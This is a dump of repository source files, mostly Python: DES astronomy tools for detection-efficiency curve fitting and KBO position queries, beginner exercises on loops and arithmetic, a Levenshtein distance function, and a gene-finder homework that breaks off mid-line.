Fetch data if needed and parse data csv file\n embed_infile = sys.argv[1]\n embed_outfile = check_files(embed_infile)\n exp_list, embed_by_expnum, embed_fakesperccd = parse_data(embed_outfile)\n \n found_infile = sys.argv[2]\n found_outfile = check_files(found_infile)\n useless, found_by_expnum, found_fakesperccd = parse_data(found_outfile)\n\n\n #If no argument given for the type of curve to fit, set to sing_tanh\n try:\n curvefit_type=sys.argv[3]\n except IndexError:\n curvefit_type='sing_tanh'\n \n if (curvefit_type!='sing_tanh' and curvefit_type!='doub_tanh'):\n print \"Please enter either 'sing_tanh' or 'doub_tanh' for the type of function to be fit to the efficiency curves!\"\n sys.exit(0)\n\n #Set paths for output files\n #PDF for efficiency curves\n eff_plots_file = 'plots/efficiencies_Y2_X2_iband_'+curvefit_type+'.pdf'\n eff_plots = PdfPages(eff_plots_file)\n \n #CSV file path and header list for efficiency curve fit parameters\n curvefit_params_file = 'curvefit_params_Y2_X2_iband_'+curvefit_type+'.csv'\n if curvefit_type=='sing_tanh':\n headers = ['EXPNUM','NITE','BAND','EFF_MAX','MAG50','WIDTH']\n if curvefit_type=='doub_tanh':\n headers = ['EXPNUM','NITE','BAND','EFF_MAX','MAG25','WIDTH1','WIDTH2'] \n\n curvefit_params = defaultdict(list) \n \n\n bad_exposures = []\n \n for exp in exp_list:\n #Set up plots\n #Plot for detection effciency curves\n fig1 = plt.figure()\n ax1=fig1.add_subplot(211)\n ax1.grid(b=True, which='major', color='k', linestyle=':')\n ax1.set_xlim(19.5,29)\n ax1.set_ylim(-0.5,2.0)\n ax1.set_xlabel('Magnitude')\n ax1.set_ylabel('Efficiency')\n ax1.set_title('Exposure #'+exp+', '+embed_by_expnum[exp][0]['BAND']+' band, Night of '+embed_by_expnum[exp][0]['NITE'])\n\n #Plot for fakes embedded/found per CCD\n ax2=fig1.add_subplot(212)\n ax2.grid(True)\n ax2.set_xlim(-1,64)\n ax2.set_xlabel('CCDNUM')\n ax2.set_ylabel('Count')\n\n \n eff_list = []\n mag_list = []\n error_list = []\n\n mag = 20.0\n magstep = 0.25\n\n while mag<99.0:\n #Build list of objects in desired magnitude bin\n embed_tmp = [float(m['TRUEMAG']) for m in embed_by_expnum[exp] if mag<=float(m['TRUEMAG'])<mag+magstep]\n found_tmp = [float(m['TRUEMAG']) for m in found_by_expnum[exp] if mag<=float(m['TRUEMAG'])<mag+magstep]\n\n if len(embed_tmp)==0:\n break\n \n eff = len(found_tmp)/len(embed_tmp)\n error = np.sqrt((1/len(embed_tmp))**2*len(found_tmp) + (len(found_tmp)/(len(embed_tmp))**2)**2*len(embed_tmp)) \n \n eff_list.append(eff)\n mag_list.append(np.median(embed_tmp))\n error_list.append(error)\n \n mag+=magstep\n\n\n #Plot eff vs. mag\n ax1.plot(mag_list, eff_list, marker='+', linestyle='None')\n ax1.errorbar(mag_list, eff_list, xerr=0, yerr=error_list, linestyle='None')\n\n \n #Number of fit parameters. 
There must be at least this many data points\n if curvefit_type=='sing_tanh':\n nparams=3\n elif curvefit_type=='doub_tanh':\n nparams=4\n\n if len(eff_list)>nparams:\n try:\n if curvefit_type=='sing_tanh':\n ax1, fit_params_tup, fit_chisq = fit_data(ax1,mag_list,eff_list)\n elif curvefit_type=='doub_tanh':\n ax1, fit_params_tup, fit_chisq = fit_data2(ax1,mag_list,eff_list)\n fit_params = [tup for tup in fit_params_tup] #Convert numpy ndarray to list\n fit_params.append(fit_chisq) #List has form [eff_max, mag50, width, fit_chisq] or [eff_max, mag25, width1, width2, fit_chisq]\n #If there more than nparams data points but the data points cannot be fit\n except RuntimeError:\n print('Exposure '+exp+' encountered a RuntimeError')\n bad_exposures.append(exp)\n fit_params = [0]*nparams\n pass\n else:\n print('Exposure '+exp+' had '+str(nparams)+' or less data points')\n bad_exposures.append(exp)\n\n\n fit_params.insert(0,embed_by_expnum[exp][0]['BAND'])\n fit_params.insert(0,embed_by_expnum[exp][0]['NITE'])\n curvefit_params[exp]=fit_params\n\n #Plot fakes embedded and found per CCD\n ax2.scatter(embed_fakesperccd[exp].keys(), embed_fakesperccd[exp].values(), marker='+')\n ax2.scatter(found_fakesperccd[exp].keys(), found_fakesperccd[exp].values(), marker='o')\n\n eff_plots.savefig(orientation='portrait')\n \n eff_plots.close()\n print \"\\nPlots saved to: \"+eff_plots_file\n \n #Write curve fitting parameters to csv file\n write_curvefit(curvefit_params,headers,curvefit_params_file)\n print \"Curve fit data saved to: \"+curvefit_params_file\n\n \nif __name__=='__main__':\n main()\n"
},
{
"alpha_fraction": 0.6473610997200012,
"alphanum_fraction": 0.6599024534225464,
"avg_line_length": 40.29496383666992,
"blob_id": "0deeff8f76541cea05526905bb74a408506bc710",
"content_id": "255b51a04b13da757d87baa3c696c4737cfa6d59",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11482,
"license_type": "no_license",
"max_line_length": 187,
"num_lines": 278,
"path": "/Tools/KBO.py",
"repo_name": "sjhamil/detectioneff_Y1",
"src_encoding": "UTF-8",
"text": "from __future__ import division\nimport numpy as np\nimport ephem\nfrom itertools import count\n#from desdb import Connection\nfrom ephem import hours, degrees, Equatorial, Ecliptic\nfrom pyOrbfit.Orbit import Orbit\nfrom Catalog import Catalog, DateTime, TimeDelta, Point\nfrom DECamField import DECamField\nfrom DECamExposure import DECamExposure\nfrom ccdBounds import *\nfrom MPCRecord import MPCRecord\n\nsidereal_rate = ephem.degrees(2*np.pi/365.256363)\n\n# adding 4.944 hours puts the sun at exactly 180 degrees ecliptic longitude\nautumnal_equinox = DateTime(ephem.next_equinox('2014-07-24') + 4.944*ephem.hour)\n\nfields = Catalog('KBOTools/fields.csv', name=str, centerra=float, centerdec=float, opposition=float, visitspath=str, orderedby='name')\nfields.add_property('center', lambda pt: Equatorial(hours(pt.centerra), degrees(pt.centerdec)))\nfields.add_property('visits', lambda pt: Catalog(pt.visitspath, nite=int, date=float, dlon=float, dlat=float, vlon=float, vlat=float))\nfields.refactor('opposition', DateTime)\nfor field in fields: field.visits.refactor('date', DateTime)\n\ndef _exp_contains(self, ra1, dec1): return DECamField(self.ra, self.dec).contains(ra1, dec1)\ndef _exp_ellipse(self): return DECamField(self.ra, self.dec).ellipse()\n\nexposures = Catalog('exposures.csv', expnum=int, date=DateTime, ra=hours, dec=degrees, exptime=float, band=str, tag=str, object=str)\nexposures.add_function('contains', _exp_contains)\nexposures.add_function('ellipse', _exp_contains)\nexpquality = Catalog('exposure_quality.csv',expnum=int,date=DateTime,band=str,object=str,accepted=str,t_eff=float,fwhm_asec=float,ellipticity=float,skybrightness=float)\n\ndef get_nite(date):\n '''\n Get a \"nite number\" of the form yyyymmdd\n from a DateTime or pyEphem date object.\n '''\n stdate = str(date)\n year, month, daytime = stdate.split('/')\n day, time = daytime.split()\n hour = time.split(':')[0]\n month = month.zfill(2)\n day = day.zfill(2)\n nite = int(year + month + day)\n return nite if int(hour) >= 12 else nite - 1\n\nexposures_by_nite = exposures.groupby(lambda pt: get_nite(pt.date))\n\ndef good_visits(field):\n goodvisits = Catalog(nite=int,date=float,band=str,t_eff=float,fwhm_asec=float,ellipticity=float,skybrightness=float)\n for visit in field.visits:\n exps = [e for e in expquality if get_nite(e.date)==visit.nite and field.name in e.object]\n good = True\n for e in exps:\n if e.accepted == 'False': good = False\n\n \n\ndef snob_query(rock, date, rng):\n '''\n Return an SQL query string that looks for SN difference imaging objects near the predicted position of rock on the specified date.\n \n rock should be a pyEphem Orbit object.\n date should be a DateTime, pyEphem date, or\n floating-point Julian Day.\n rng specifies the search range in both ra and dec,\n in (decimal) degrees.\n Fields returned are date_obs, ra, dec, expnum,\n exptime, band, ccdnum, mag, pixelx, pixely,\n snobjid, ml_real_bogus_score.\n '''\n pos = rock.predict_pos(date)\n ra, dec = pos['ra'] * 180/np.pi, pos['dec'] * 180/np.pi\n nite = get_nite(date)\n query = \"select e.date_obs, o.ra, o.dec, e.expnum, e.exptime, o.band, o.ccdnum, o.mag, o.pixelx, o.pixely, o.snobjid, \" \\\n \"o.ml_real_bogus_score from snobs_legacy o join exposure e on o.exposureid = e.expnum where e.nite = \" + \\\n str(nite) + \" and o.ra between \" + str(ra - rng) + \" and \" + str(ra + rng) + \" and o.dec between \" + \\\n str(dec - rng) + \" and \" + str(dec + rng) + \" order by e.date_obs\"\n return query\n\ndef object_query(rock, date, 
rng):\n '''\n Return an SQL query string that looks for wide survey objects near the predicted position of rock on the specified date.\n \n rock should be a pyEphem Orbit object.\n date should be a DateTime, pyEphem date, or\n floating-point Julian Day.\n rng specifies the search range in both ra and dec,\n in (decimal) degrees.\n Fields returned are date_obs, ra, dec, expnum,\n exptime, band, ccd, mag_psf, xwin_image, ywin_image,\n tag.\n '''\n pos = rock.predict_pos(date)\n ra, dec = pos['ra'] * 180/np.pi, pos['dec'] * 180/np.pi\n nite = get_nite(date)\n query = \"select e.date_obs, o.ra, o.dec, e.expnum, e.exptime, i.band, i.ccd, o.mag_psf, o.xwin_image, o.ywin_image, t.tag from \" \\\n \"objects_current o, image i, exposure e, runtag t where i.exposureid = e.id and o.imageid = i.id and i.run = t.run and \" \\\n \"e.nite = \" + str(nite) + \" and o.ra between \" + str(ra - rng) + \" and \" + str(ra + rng) + \" and o.dec between \" + \\\n str(dec - rng) + \" and \" + str(dec + rng) + \" order by e.date_obs\"\n return query\n\ndef field_query(field, band='i'):\n '''\n Return an SQL query string that looks for the nights when a given field was visited.\n \n This looks for i-band exposures by default.\n Fields returned are nite, date_obs, expnum, object.\n '''\n query = \"select distinct e.nite, e.date_obs, e.expnum, e.object from exposure e where e.object like 'DES supernova hex SN-\" + \\\n field + \"%' and e.band='\" + band + \"' order by e.date_obs\"\n return query\n\ndef anomalies(field, date):\n '''\n Calculate the shifts in ecliptic coordinates expected for a stationary object in the specified field on the specified date.\n \n date should be a DateTime object, pyEphem\n date, floating-point JD, or compatible string.\n Results are returned as a pair (dlon, dlat),\n in arbitrary units. To get appropriately scaled\n results, multiply by the reciprocal of the object's\n distance from the sun in AU.\n '''\n field = fields[field]\n date = DateTime(date)\n omegat = sidereal_rate * (date - field.opposition)\n lat = Ecliptic(field.center).lat\n dlon = -np.sin(omegat)/np.cos(lat)\n dlat = np.cos(omegat)*np.sin(lat)\n return dlon, dlat\n\ndef velocities(field, date):\n '''\n Calculate the expected rates of change of ecliptic coordinates expected for a stationary object in the specified field on the specified date.\n \n date should be a DateTime object, pyEphem\n date, floating-point JD, or compatible string.\n Results are returned as a pair (vlon, vlat),\n in arbitrary units. 
To get appropriately scaled\n results, multiply by the sidereal rate and then\n by the reciprocal of the object's distance from\n the sun in AU.\n '''\n field = fields[field]\n date = DateTime(date)\n omegat = sidereal_rate * (date - field.opposition)\n lat = Ecliptic(field.center).lat\n vlon = -np.cos(omegat)/np.cos(lat)\n vlat = -np.sin(omegat)*np.sin(lat)\n return vlon, vlat\n\ndef toDateTime(ISOdate):\n '''\n Transform an ISO date string into a DateTime object.\n '''\n datestring = ' '.join(ISOdate.split('T'))\n return DateTime(datestring)\n\ndef pretty_nite(nite):\n '''\n Return a string in yyyy/mm/dd format from a\n \"nite number\" of the form yyyymmdd.\n '''\n nitestr = str(nite)\n nitestr = \"/\".join([nitestr[:4], nitestr[4:6], nitestr[6:]])\n return nitestr\n\ndef sexagesimal(ra, dec):\n '''\n Return the sexagesimal representation, as pyEphem\n objects, of the coordinates (ra, dec), which are\n taken to be in decimal degree format.\n '''\n return hours(float(ra) * np.pi/180), degrees(float(dec) * np.pi/180)\n\ndef decimal(ra, dec):\n '''\n Return the decimal degree representation of the\n coordinates (ra, dec), which are taken to be in\n radians (or pyEphem objects stored that way).\n '''\n return hours(ra) * 180/np.pi, degrees(dec) * 180/np.pi\n\ndef days_between(start, stop):\n '''\n Return a generator object that iterates over\n the days between start and stop as DateTime objects.\n '''\n startd, stopd = DateTime(start), DateTime(stop)\n d = startd\n while d < stopd:\n yield d\n d = DateTime(d + 1)\n\ndef compute_chip(rockra, rockdec, expra, expdec):\n '''\n Given the ra and dec of a point and of the center\n of an exposure, find the CCD containing that point.\n \n Returns a pair of the CCD name and number.\n '''\n deltara = 180/np.pi*ephem.degrees(rockra-expra).znorm # compute difference in degrees (normalized between -180, +180)\n deltadec = 180/np.pi*ephem.degrees(rockdec-expdec).znorm # the 180/pi is because ephem.Angle objects are natively in radians\n ccdname = 'None'\n for k in ccdBounds:\n if deltara > ccdBounds[k][0] and deltara < ccdBounds[k][1] and deltadec > ccdBounds[k][2] and deltadec < ccdBounds[k][3]:\n ccdname = k\n return ccdname, ccdNum[ccdname]\n\ndef find_exposures(target_ra, target_dec):\n '''\n Find exposures containing a given (ra, dec).\n \n Returns a list of dictionaries with keys 'expnum', 'ccd', 'date', 'band'\n expnum is the exposure number\n ccd is the (integer) chip id\n date is the date as a DateTime object\n band is the band (g,r,i,z).\n '''\n match = []\n for exp in exposures:\n if exp.contains(target_ra, target_dec):\n ccdname, ccdnum = compute_chip(target_ra, target_dec, exp.ra, exp.dec)\n this_match = {'expnum': exp.expnum, 'ccd': ccdnum, 'date': exp.date, 'band': exp.band}\n if ccdnum != -99: match.append(this_match)\n return match\n\ndef find_exposures_by_nite(nite, target_ra, target_dec, snfields = True):\n '''\n Find exposures on a given night containing a given (ra, dec).\n \n Returns a list of dictionaries with keys 'expnum', 'ccd', 'date', 'band'\n expnum is the exposure number\n ccd is the (integer) chip id\n date is the date as a DateTime object\n band is the band (g,r,i,z).\n '''\n match = []\n for exp in exposures_by_nite[nite]:\n if exp.contains(target_ra, target_dec) and (snfields or not exp.object.startswith('DES supernova hex')):\n ccdname, ccdnum = compute_chip(target_ra, target_dec, exp.ra, exp.dec)\n this_match = {'expnum': exp.expnum, 'ccd': ccdnum, 'date': exp.date, 'band': exp.band}\n if ccdnum != -99: 
match.append(this_match)\n return match\n\ndef count(start = 0):\n i = start\n while True:\n i += 1\n yield i\n \n \n #def __init__(self, obsnum=' ', MPprovisional=' ', discovery=' ', note1=' ', \n # note2='C', obsdate=ephem.date('2000/01/01'), ra_obs_J2000=ephem.hours(0), dec_obs_J2000=ephem.degrees(0), \n # mag=99, band='r', observatoryCode='W84', newobject=True): \ndef MPCobservation(point, temp_designation=' ', packed_designation=' '):\n newobject=False\n if packed_designation==' ': newobject=True\n if newobject==False and packed_designation==' ':\n print 'MPCobservation Error, must supply packed designation'\n rec = MPCRecord(obsnum=packed_designation, MPprovisional=temp_designation, obsdate=ephem.date(point.date+point.exptime*ephem.second/2), ra_obs_J2000=point.ra, dec_obs_J2000=point.dec,\n mag=point.mag, band=point.band, newobject=newobject)\n return rec.record\n\ndef absolute_magnitude(orbit, apparent_mag, date_obs):\n # computes the absolute magnitude of an object, given its orbit and apparent magnitude on date_obs\n body = orbit.ellipticalBody()\n body.compute(date_obs)\n d_BS = body.sun_distance\n d_BE = body.earth_distance\n d_ES = 1.0\n cos_chi = (d_BE**2 + d_BS**2 - d_ES**2)/(2*d_BE*d_BS)\n chi = np.arccos(cos_chi)\n# P = (2/3)*((1-chi/np.pi)*np.cos(chi) + (1/np.pi)*np.sin(chi))\n P=1\n H = apparent_mag - 2.5*np.log10(d_BS**2*d_BE**2/(P*d_ES**4))\n return H\n\n\n"
}
] | 2 |
bamundagaaloyzius/pythonstart
|
https://github.com/bamundagaaloyzius/pythonstart
|
6f5abd69dc25de57de071146cfff908ede266e0d
|
2c35a818d6bd86e074c1b5cb6849518167efdf17
|
ad978fa026d8918814f6181a7721c3463961d5a4
|
refs/heads/master
| 2021-06-24T01:25:24.388956 | 2021-02-11T06:39:55 | 2021-02-11T06:39:55 | 193,876,022 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.49056604504585266,
"alphanum_fraction": 0.5094339847564697,
"avg_line_length": 10.666666984558105,
"blob_id": "8bcbf13f2cb773826fbe1961d9c1b85d7e0e81ec",
"content_id": "28c51de70efb243400532d8d25e5c2013afcd9d9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 106,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 9,
"path": "/loops.py",
"repo_name": "bamundagaaloyzius/pythonstart",
"src_encoding": "UTF-8",
"text": "# seq= [\"hei\",\"too\"]\n\n# for item in seq:\n# \tprint(\"ally\")\n\n\ni=3\nwhile i<5:\n\tprint (\"i is: {}\".format(i))\n\t"
},
{
"alpha_fraction": 0.44999998807907104,
"alphanum_fraction": 0.550000011920929,
"avg_line_length": 9,
"blob_id": "88182ee463f00c27907098416f777aba6b30dce2",
"content_id": "9080dad591b6cd56016d4fa888d56ea3972f670e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 20,
"license_type": "no_license",
"max_line_length": 10,
"num_lines": 2,
"path": "/loops_2.py",
"repo_name": "bamundagaaloyzius/pythonstart",
"src_encoding": "UTF-8",
"text": "if (i%2)=1\nprint(i) "
},
{
"alpha_fraction": 0.6098265647888184,
"alphanum_fraction": 0.6445086598396301,
"avg_line_length": 20.4375,
"blob_id": "31df39f95bf4ac3af7432040badba315f32247b5",
"content_id": "5d08c49399722b404ad1aff72daa061f1a071937",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 346,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 16,
"path": "/sum_of_two_numbers.py",
"repo_name": "bamundagaaloyzius/pythonstart",
"src_encoding": "UTF-8",
"text": "\n\nnum_1 = input(\"type first number\")\nnum_2 = input(\"type second number\")\nresult = float(num_1) + float(num_2)\nprint(result)\n\n# num1 = input(\"type first number\")\n# num2 = input(\"type second number\")\n\n# def add_two_numbers(num1, num2):\n# \ttotal = float(num1) + float(num2)\n# \t# print(total)\n# \treturn total\n\n# x = add_two_numbers(3,5)\n\n# print(x)\n\n"
},
{
"alpha_fraction": 0.7777777910232544,
"alphanum_fraction": 0.7777777910232544,
"avg_line_length": 26,
"blob_id": "9794b8e8e798d5b3a3128a8147cafb1b5acdcfc0",
"content_id": "af314dd77193560d3dfde8235d9cb1ab72603205",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 54,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 2,
"path": "/README.md",
"repo_name": "bamundagaaloyzius/pythonstart",
"src_encoding": "UTF-8",
"text": "This is my first file\nThis is a test with nano editor\n"
},
{
"alpha_fraction": 0.6258503198623657,
"alphanum_fraction": 0.6326530575752258,
"avg_line_length": 17.5,
"blob_id": "15efd3b85217d7e7949717c577e1791cde9cd519",
"content_id": "b7f43a683c58d37ac8fe326b01948827f28ca707",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 147,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 8,
"path": "/sum_of_N_numbers.py",
"repo_name": "bamundagaaloyzius/pythonstart",
"src_encoding": "UTF-8",
"text": "N = int(input(\"how many numbers do u want to add\"))\n\nsum = 0\nfor i in range(N):\n\tsum = sum+int(input(\"Enter number:\\n\"))\n\n\nprint(\"The sum is \",sum)"
},
{
"alpha_fraction": 0.56886225938797,
"alphanum_fraction": 0.6047903895378113,
"avg_line_length": 10.571428298950195,
"blob_id": "6c69e671e23cb7009d50bf0331833402e309a044",
"content_id": "7441d9bc1beba33aea43f936889ebd363f4ca533",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 167,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 14,
"path": "/control_statements.py",
"repo_name": "bamundagaaloyzius/pythonstart",
"src_encoding": "UTF-8",
"text": "\n#if else statements\nif 2==5:\n\tprint(\"fake\")\nelse:\n\tprint(\"playing with my head\")\n\nif 1==2:\n\tprint(\"hi\")\nelif 7==2:\n\tprint(\"sure\")\nelse:\n\tprint(\"true\")\n\n# comment\n\n\n\n\n"
},
{
"alpha_fraction": 0.5917159914970398,
"alphanum_fraction": 0.6153846383094788,
"avg_line_length": 7.095238208770752,
"blob_id": "13d3d57d8383e1eed8dcb27f4764c4b58be937d4",
"content_id": "dbe6b6ab9967172d53b3d75d4ff32e15662cc328",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 169,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 21,
"path": "/arithmetic.py",
"repo_name": "bamundagaaloyzius/pythonstart",
"src_encoding": "UTF-8",
"text": "x=10.3\ny=4\n\n#addition\nz=x+y\nprint(\"z is \" + str(z))\n\n#multiplication\n\nw =x*y\nprint(\"w is \" + str(w ))\n\n#subtraction\n\nprint(y-x)\n\n#modulo\nprint(y%x)\n\n#division\nprint(x/y)"
}
] | 7 |
dcelik/SoftwareDesign
|
https://github.com/dcelik/SoftwareDesign
|
7b9939c947a0125fd446e0c10128f843134a6d5a
|
6397a4d3b60d23971159f11ce0ac5b006c35dd21
|
135cc16855ad83ed350c3e2c6c6be5751341f586
|
refs/heads/master
| 2021-01-18T02:01:34.171899 | 2014-04-10T17:50:50 | 2014-04-10T17:50:50 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4974619150161743,
"alphanum_fraction": 0.5702199935913086,
"avg_line_length": 25.909090042114258,
"blob_id": "3e7cd5be996fd86d98dc9a7535dcce4ab6cb3680",
"content_id": "98d61768a5d8485d0d43a75a145f5c73d754394a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 591,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 22,
"path": "/levenshtein.py",
"repo_name": "dcelik/SoftwareDesign",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 20 15:04:21 2014\n\n@author: dcelik\n\"\"\"\n\ndef levenshtein_distance(s1,s2,d={}):\n \"\"\" \n Computes the Levenshtein distance between two input strings \n \"\"\"\n if len(s1) == 0:\n return len(s2)\n if len(s2) == 0:\n return len(s1)\n elif (s1,s1) in d:\n return d[(s1,s2)]\n else:\n x = min([int(s1[0] != s2[0]) + levenshtein_distance(s1[1:],s2[1:]), 1+levenshtein_distance(s1[1:],s2), 1+levenshtein_distance(s1,s2[1:])])\n d[(s1,s2)]=x\n return x\nprint levenshtein_distance(\"denizecelik\",\"ryanlouie\")"
},
{
"alpha_fraction": 0.654549241065979,
"alphanum_fraction": 0.65932697057724,
"avg_line_length": 41.79111099243164,
"blob_id": "f5e771d6a36145eb7e473e33ba4dcc813df7d137",
"content_id": "b296841ef332c2c91664bc08afe9da06135eeb4d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9628,
"license_type": "no_license",
"max_line_length": 296,
"num_lines": 225,
"path": "/hw3/gene_finder.py",
"repo_name": "dcelik/SoftwareDesign",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 2 11:24:42 2014\n\n@author: Deniz Celik\n\nSkeleton provided by Paul Ruvolo\n\"\"\"\n\n# you may find it useful to import these variables (although you are not required to use them)\nfrom amino_acids import aa, codons\nfrom random import shuffle\nfrom load import *\n\ndef collapse(L):\n \"\"\" Converts a list of strings to a string by concatenating all elements of the list \"\"\"\n output = \"\"\n for s in L:\n output = output + s\n return output\n\ndef coding_strand_to_AA(dna):\n \"\"\" Computes the Protein encoded by a sequence of DNA. This function\n does not check for start and stop codons (it assumes that the input\n DNA sequence represents an protein coding region).\n \n dna: a DNA sequence represented as a string\n returns: a string containing the sequence of amino acids encoded by the\n the input DNA fragment\n \"\"\"\n dnainp = dna\n protein = ''\n if len(dnainp)<3:\n return \"ERROR: The provided fragment is too short to contain any codons.\"\n# elif len(dnainp)%3 is not 0:\n# print \"Warning: The provided DNA fragment does not contain an integer number of codons. Excess bases were leftout.\"\n while len(dnainp) >=3:\n cod = dnainp[:3]\n for i in codons:\n for j in i:\n if j == cod:\n protein = protein + aa[codons.index(i)]\n dnainp = dnainp[3:]\n return protein\n \ndef coding_strand_to_AA_unit_tests():\n \"\"\" Unit tests for the coding_strand_to_AA function \"\"\"\n print \"input: GTTGACAGTACGTACAGGGAA, \"+\"output: \"+coding_strand_to_AA(\"GTTGACAGTACGTACAGGGAA\")+\", actual output: VDSTYRE\"\n print \"input: TTATTGCTTATTATCATG, \"+\"output: \"+coding_strand_to_AA(\"TTATTGCTTATTATCATG\")+\", actual output: LLLIIM\"\n print \"input: TTTTTAATTATGGTTTCTCCTACTGCTTATTAACATCAAAATAAAGATGAATGTTGGCGTGGT, \"+\"output: \"+coding_strand_to_AA(\"TTTTTAATTATGGTTTCTCCTACTGCTTATTAACATCAAAATAAAGATGAATGTTGGCGTGGT\")+\", actual output: FLIMVSPTAY|HQNKDECWRG\"\n print \"input: TT, \" + \"output: \"+coding_strand_to_AA(\"TT\")+\", actual output: ERROR: The provided fragment is too short to contain any codons.\"\n\ndef get_reverse_complement(dna):\n \"\"\" Computes the reverse complementary sequence of DNA for the specfied DNA\n sequence\n \n dna: a DNA sequence represented as a string\n returns: the reverse complementary DNA sequence represented as a string\n \"\"\"\n \n dna = dna.replace('T','N')\n dna = dna.replace('A','T')\n dna = dna.replace('N','A')\n dna = dna.replace('C','N')\n dna = dna.replace('G','C')\n dna = dna.replace('N','G')\n dna = dna[::-1]\n return dna\n \ndef get_reverse_complement_unit_tests():\n \"\"\" Unit tests for the get_complement function \"\"\"\n print \"input: GTTGACAGTACGTACAGGGAA, \"+\"output: \"+ get_reverse_complement(\"GTTGACAGTACGTACAGGGAA\") +\", actual output: AAGGGACATGCATGACAGTTG\" \n print \"input: TTATTGCTTATTATCATG, \"+\"output: \"+get_reverse_complement(\"TTATTGCTTATTATCATG\")+\", actual output: GTACTATTATTCGTTATT\"\n print \"input: ATC, \"+\"output: \"+get_reverse_complement(\"ATC\")+\", actual output: GAT\"\n print \"input: CTA, \"+\"output: \"+get_reverse_complement(\"CTA\")+\", actual output: TAG\"\n\ndef rest_of_ORF(dna):\n \"\"\" Takes a DNA sequence that is assumed to begin with a start codon and returns\n the sequence up to but not including the first in frame stop codon. 
If there\n        is no in frame stop codon, returns the whole string.\n        \n        dna: a DNA sequence\n        returns: the open reading frame represented as a string\n    \"\"\"\n    \n    if dna[:3]== \"TAG\" or dna[:3]==\"TAA\" or dna[:3]==\"TGA\" or len(dna)<3:\n        return \"\"\n    if len(dna)<=3:\n        return dna\n    return dna[:3]+rest_of_ORF(dna[3:])\n\ndef rest_of_ORF_unit_tests():\n    \"\"\" Unit tests for the rest_of_ORF function \"\"\"\n    print \"input: CTA, \"+\"output: \"+rest_of_ORF(\"CTA\")+\", actual output: CTA\"\n    print \"input: GTCACTTAGGGTTTT, \"+\"output: \"+rest_of_ORF(\"GTCACTTAGGGTTTT\")+\", actual output: GTCACT\"\n    print \"input: AAATTTTATAATGGGTGAAGTTAG, \"+\"output: \"+rest_of_ORF(\"AAATTTTATAATGGGTGAAGTTAG\")+\", actual output: AAATTTTATAATGGG\"\n    print \"input: TATATGGAGGATAATAGTTGATAATAG, \"+\"output: \"+rest_of_ORF(\"TATATGGAGGATAATAGTTGATAATAG\")+\", actual output: TATATGGAGGATAATAGT\"\n\ndef find_all_ORFs_oneframe(dna):\n    \"\"\" Finds all non-nested open reading frames in the given DNA sequence and returns\n        them as a list. This function should only find ORFs that are in the default\n        frame of the sequence (i.e. they start on indices that are multiples of 3).\n        By non-nested we mean that if an ORF occurs entirely within\n        another ORF, it should not be included in the returned list of ORFs.\n        \n        dna: a DNA sequence\n        returns: a list of non-nested ORFs\n    \"\"\"\n    dnainp = dna\n    orfs = []\n    if len(dnainp)<3:\n        orfs.append(dna)\n    while len(dnainp)>=3:\n        if dnainp[:3]=='ATG':\n            orfs.append(rest_of_ORF(dnainp))\n            minuslen = len(rest_of_ORF(dnainp))+3\n            dnainp = dnainp[minuslen:]\n        else:\n            dnainp = dnainp[3:]\n    y = [s for s in orfs if s!='']\n    return y\n\ndef find_all_ORFs_oneframe_unit_tests():\n    \"\"\" Unit tests for the find_all_ORFs_oneframe function \"\"\"\n\n    # YOUR IMPLEMENTATION HERE\n\ndef find_all_ORFs(dna):\n    \"\"\" Finds all non-nested open reading frames in the given DNA sequence in all 3\n        possible frames and returns them as a list. 
By non-nested we mean that if an\n    ORF occurs entirely within another ORF and they are both in the same frame,\n    it should not be included in the returned list of ORFs.\n    \n    dna: a DNA sequence\n    returns: a list of non-nested ORFs\n    \"\"\"\n    ans = find_all_ORFs_oneframe(dna)\n    ans.extend(find_all_ORFs_oneframe(dna[1:]))\n    ans.extend(find_all_ORFs_oneframe(dna[2:]))\n    return ans\n\ndef find_all_ORFs_unit_tests():\n    \"\"\" Unit tests for the find_all_ORFs function \"\"\"\n\n    print \"input: ATGCTA, \"+\"output: \"+ \",\".join(find_all_ORFs(\"ATGCTA\"))+\", actual output: CTA\"\n    print \"input: GTCACTTATGGGTTT, \"+\"output: \"+\",\".join(find_all_ORFs(\"ATGGATGCTTAGGGATGTTT\"))+\", actual output: GTCACT,GGTTTT,TCACTTAGGGTTTT,CACTTAGGGTTTT\"\n    print \"input: AAATTTTATAATGGGTGAAGTTAG, \"+\"output: \"+\",\".join(find_all_ORFs(\"AAATTTTATAATGGGTGAAGTTAG\"))+\", actual output: ATGGGTGAAGTT\"\n    print \"input: TATATGGAGGATAATAGTTGATAATAG, \"+\"output: \"+ \",\".join(find_all_ORFs(\"TATATGGAGGATAATAGTTGATAATAG\"))+\", actual output: ATGGAGGATAATAGT\"\n\ndef find_all_ORFs_both_strands(dna):\n    \"\"\" Finds all non-nested open reading frames in the given DNA sequence on both\n    strands.\n    \n    dna: a DNA sequence\n    returns: a list of non-nested ORFs\n    \"\"\"\n    return find_all_ORFs(dna) + 